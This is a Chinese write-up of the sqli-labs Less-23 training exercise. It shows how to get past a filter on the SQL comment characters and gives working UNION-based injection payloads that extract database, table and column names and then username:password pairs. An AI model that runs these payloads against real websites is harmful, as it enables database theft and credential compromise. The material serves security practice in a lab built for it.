sqli-labs-Less-23

sqli-labs 实验记录

Less-23

这一关又回到了get注入方式,与之前的关卡不同的是,这一关采用了过滤"#"、"--"符号,导致之前所使用的注释符无法起到作用。破解的基本思路是构造一条特殊查询语句,使得SQL语句起到想要的效果。

第一步:查找注入点

打开网页之后,提示输入id号,我们按照提示输入id=1。

结果如图如示:网页返回用户名:Dump与密码:12。

首先我们采用之前的方法,输入"-1' union select 1,2,3#",页面返回语法错误。

查询原代码之后发现,过滤了"#"与"--",使得原先的注释符不起作用,但同时,我们也发现了SQL查询语句,通过构造特殊的查询语句,也可以达到想到的效果。

通过观察上述原代码中的SQL查询语句:

复制代码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"

输入payload:

复制代码
-1' union select 1,2,3 and '1'='1

使得这句SQL查询语句变为下列语句:

复制代码
$sql="SELECT * FROM users WHERE id='-1' union select 1,2,3 and '1'='1' LIMIT 0,1"

这一关的核心破解思路是由条语句演变而来:

通过分析这条语句,我们可以看出,这条语句由三部分组成,第一部分id='-1',主要作用是让查询数据失效,执行我们想要的第二部分语句,即"union select 1,2,3",这条语句是最主要的查询语句,后续查询数据库与表、列名等数据都是通过修改这条语句实现的。第三部分是'1'='1,主要作用是与原代码中的limit语句相接,使之构成一条完整的SQL查询语句,保持语法的正确。

第二步:查询数据库名、表名、列名以及其它具体数据的

由上述语句进一步修改,可以得到查询数据库名、表名、列名以及具体数据的方法。

  • 查询数据库名

    复制代码
    -1' union select 1,database(),3 and '1'='1
  • 查询表名

    复制代码
    -1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 and '1'='1
  • 查询列名

    复制代码
    -1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 and '1'='1
  • 查询具体数据

    复制代码
    -1' union select 1,(select concat(username,':',password) from security.users limit 0,1),3 and '1'='1

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
倔强的石头_7 小时前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
SelectDB9 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
jiayou641 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr3 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫4 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩4 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
小满8784 天前
5.Mysql事务隔离级别与锁机制
mysql
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库